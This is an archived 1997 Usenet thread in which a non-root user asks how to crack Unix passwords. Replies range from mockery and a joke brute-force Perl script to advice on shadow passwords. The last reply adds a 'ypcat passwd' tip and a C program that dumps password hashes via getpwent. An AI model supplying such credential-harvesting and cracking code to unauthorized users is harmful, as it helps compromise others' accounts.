How to crack passwords ???

Post by Pieter Marten » Wed, 22 Oct 1997 04:00:00

Hi,

Is there anybody who can tell me how to crack unix passwords ?
(I am no root)

tnx !

How to crack passwords ???

Post by r.car.. » Wed, 22 Oct 1997 04:00:00

>Hi,

>Is there anybody who can tell me how to crack unix passwords ?
>(I am no root)

Open a book, any book to any page close your eyes, point to one of the
open pages. Beneath your grimey little finger will be a wor or words.
Keeping your eyes close, use your free hand grab a hammer. Lart yourself.

--

"I don't like it, and I'm sorry I ever had anything to do with it."
-Erwin Schrodinger

How to crack passwords ???

Post by Tony Fitzgera » Wed, 22 Oct 1997 04:00:00

>Is there anybody who can tell me how to crack unix passwords ?

The following Perl script should crack all passwords on your system unless
you're using shadow passwords in which case it gets a little more
complicated:

 #!/usr/local/bin/perl -w

   open PW,"/etc/passwd"      or die "$0: can't read: $!";
 NXPW:
   while(<PW>) {
     my($lgid,$crypt)= split/\:/;
     my $seed= substr($crypt,0,2);
     for($i=0;$i<=255;++$i) {
       for($j=0;$j<=255;++$j) {
         for($k=0;$k<=255;++$k) {
           for($l=0;$l<=255;++$l) {
             for($m=0;$m<=255;++$m) {
               for($n=0;$n<=255;++$n) {
                 for($o=0;$o<=255;++$o) {
                   for($p=0;$p<=255;++$p) {
                     my $guess= pack('CCCCCCCC',$i,$j,$k,$l,$m,$n,$o,$p);
                     next unless $crypt eq crypt($guess,$seed);
                     print "password for $lgid is $guess\n"
                     next NXPW;
                   }
                 }
               }
             }
           }
         }
       }
     }
   }

Just put the above into a file called "Cracker" then chmod the file 755
and issue the command  Cracker  and you're off to the races.  I assume that
you're paying for the CPU usage on the system?
--

How to crack passwords ???

Post by Brian O'Neil » Thu, 23 Oct 1997 04:00:00

[Brute force guesser in perl deleted]

I actually had someone write a little C program that did just this,
although limited to [A-Za-z]. He ran it on an older VAX. I was quite
amused when I calculated that it would have taken 200,000 years to 50%
of the passwords (those that use only letters, that is)...the system
seldom ran for more than a week without rebooting...

He was also working at a government contractor, and e-mailing the
results to himself there. They were NOT amused...

Brian O'Neill - Director of Computing, Computer Science (508) 934-3645

"My God man...we've become a tourist attraction..." - Londo, Babylon-5

How to crack passwords ???

Post by Marc SCHAEFE » Thu, 23 Oct 1997 04:00:00

> Is there anybody who can tell me how to crack unix passwords ?
> (I am no root)

If you are not root, try to look at /etc/passwd. If this
looks like this:

root:x:0:0:root:/root:/bin/bash
schaefer:x:1000:100:Marc SCHAEFER,Colombier,038,:/users/schaefer:/bin/tcsh
fnet:x:6000:108:FIDONET Handler,Colombier,038,:/users/fnet:/bin/tcsh

In that case, the system uses shadow password, and probably the
only way to get encrypted password is to become root anyway (chicken
and egg problem).

Or you can try to guess passwords through human relations :-)

If the system has a few characters instead of x, it does not
run shadow passwords and thus you should mail the local
administrator to upgrade his system, or at least run
Crack regularly on the encrypted passwords.

How to crack passwords ???

--
That's a hard work, for more information go to alt.2600.

Also, try 2600.faq, there is all the information about that.

P.D.: There is a software called Crack, I think that the most recent
version is 5.0.  This software have a data base of common use words, and
tries to find if one of this has the same match that the password
looked.

Remove Anti-span: QUIT_THIS

Sorry, but my English is terrible.

--------------2781446B794B

> > Is there anybody who can tell me how to crack unix passwords ?
> > (I am no root)

> If you are not root, try to look at /etc/passwd. If this
> looks like this:

> root:x:0:0:root:/root:/bin/bash
> schaefer:x:1000:100:Marc SCHAEFER,Colombier,038,:/users/schaefer:/bin/tcsh
> fnet:x:6000:108:FIDONET Handler,Colombier,038,:/users/fnet:/bin/tcsh

> In that case, the system uses shadow password, and probably the
> only way to get encrypted password is to become root anyway (chicken
> and egg problem).

> Or you can try to guess passwords through human relations :-)

> If the system has a few characters instead of x, it does not
> run shadow passwords and thus you should mail the local
> administrator to upgrade his system, or at least run
> Crack regularly on the encrypted passwords.

--

Also, you can try:

If your system has yp deamons

% ypcat passwd

or try the program in the attachment.

Remove Anti-span: QUIT_THIS

Sorry, but my English is terrible.

--------------2781446B794B

#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);

Quote:}

--------------2781446B794B--